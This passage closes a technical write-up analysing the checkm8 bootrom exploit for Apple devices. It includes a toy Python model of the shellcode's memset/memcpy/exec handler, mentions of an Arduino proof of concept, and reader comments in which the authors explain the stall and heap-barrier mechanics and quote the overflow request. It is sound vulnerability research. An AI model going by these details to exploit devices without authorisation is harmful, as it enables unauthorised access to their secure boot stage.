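    The dispatch logic can be modelled in a few lines. This is a toy model over a bytearray, not the handler from the shellcode: the command names are passed as strings, and the way commands and arguments are actually encoded in the USB request is not covered here and is left as an assumption.

```python
MAGIC_WVALUE = 0xFFFF  # value the new handler compares wValue against


def make_handler(memory, original_handler):
    """Return a handler that serves magic requests and forwards everything else."""
    def handler(w_value, command=None, args=()):
        if w_value != MAGIC_WVALUE:
            return original_handler(w_value)
        if command == "memset":
            dst, value, length = args
            memory[dst:dst + length] = bytes([value]) * length
            return None
        if command == "memcpy":
            dst, src, length = args
            memory[dst:dst + length] = memory[src:src + length]
            return None
        if command == "exec":
            func, *func_args = args
            return func(*func_args)
        raise ValueError("unknown command")
    return handler


memory = bytearray(16)
handler = make_handler(memory, lambda w_value: "original")

print(handler(0x0001))                          # forwarded to the original handler
handler(MAGIC_WVALUE, "memset", (0, 0x41, 4))   # fill 4 bytes with 'A'
handler(MAGIC_WVALUE, "memcpy", (8, 0, 4))      # copy them to offset 8
print(bytes(memory))
print(handler(MAGIC_WVALUE, "exec", (max, 3, 7)))
```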


    Thus, the analysis of the exploit is complete.


    The implementation of the exploit at a lower level of working with USB


    As a bonus and an example of the attack at lower levels, we published a Proof-of-Concept of the checkm8 implementation on Arduino with USB Host Shield. The PoC works only for iPhone 7 but can be easily ported to other devices. When an iPhone 7 in DFU mode is connected to USB Host Shield, all the steps described in this article will be executed, and the device will enter PWND:[checkm8] mode. Then, it can be connected to a PC via USB to work with it using ipwndfu (to dump memory, use crypto keys, etc.). This method is more stable than using asynchronous requests with a minimal timeout because we work directly with the USB controller. We used the USB_Host_Shield_2.0 library. It needs minor modifications; the patch file is also in the repository.



    In place of a conclusion


    Analyzing checkm8 was very interesting. We hope that this article will be useful for the community and will motivate new research in this area. The vulnerability will continue to influence the jailbreak community. A jailbreak based on checkm8, checkra1n, is already being developed, and since the vulnerability is unfixable, it will always work on vulnerable chips (A5 to A11) regardless of the iOS version. Plus, there are many other vulnerable devices, such as Apple Watch and Apple TV. We expect more interesting projects for Apple devices to come.


    Besides jailbreaking, this vulnerability will also influence researchers of Apple devices. With checkm8, you can already boot iOS devices in verbose mode, dump SecureROM, or use the GID key to decrypt firmware images. However, the most interesting application of this exploit would be entering debug mode on vulnerable devices with a special JTAG/SWD cable. Previously, this could only be done with special prototypes that are extremely hard to get or with the help of special services. Thus, with checkm8, Apple research becomes much easier and cheaper.


    References


    1. Jonathan Levin, *OS Internals: iBoot
    2. Apple, iOS Security Guide
    3. littlelailo, apollo.txt
    4. usb.org
    5. USB in a NutShell
    6. ipwndfu
    7. an ipwndfu fork from LinusHenze
    Comments 4

      +3
      I read the whole content and see the structure that is briefly explained about the unique technologies. I get unique information from your post. Thanks for sharing with us.
        +1
        1) What exactly does the stall do?

        • It seems to prevent the io requests on the execution queue from being completed, providing enough time to add any number of them before the usb bus is reset. This is implied but not said explicitly.
        • How can the USB bus be "stalled" but still receive additional setup packets and data from later USB packets from the host?


        2) It seems you added an extra usb_leak() to the end before sending the overwrite payload. Is there a purpose of the extra send?
        • It seems likely not. If I have interpreted your analysis correctly, there would then be three io_requests on the heap after the io_buffer rather than two in the original checkm8, right? One for the stall and then two more for the two usb_leak calls.


        Thanks so much for this. Great post. You guys did some excellent work here.
          +1

          Thank you for your reply and good question!


          1) stall is needed to create an incomplete USB transaction. You are right: this is necessary to prevent the request from completing, which makes it possible to build a request queue. The delay does not matter. Further requests can be executed even after a fairly long pause following the stall (for example, 10 seconds). In fact, the USB bus does not go into the STALL state (no STALL handshake packets are sent, only NAK). At the same time, the controller always processes SETUP packets, which is why it is possible to create a request queue.


          2) No additional requests are needed. As it turned out, in the presented version of the exploit, even a single stall request is enough: it will be overwritten with new "callback" and "next" values. Apparently, this is possible because, before the overflow happens while executing the USB_REQ_SET_CONFIGURATION request (libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)), another request is created and remains in the heap (see SecureROM sources). It plays the role of a heap barrier and prevents access to the corrupted metadata of the overflowed request during further work with the heap. If you use the request from the original code (libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, t8010_overwrite, 50)), then the second request is needed as a heap barrier.

          +1
          Nice work! Thanks for this article, very informative and valuable.
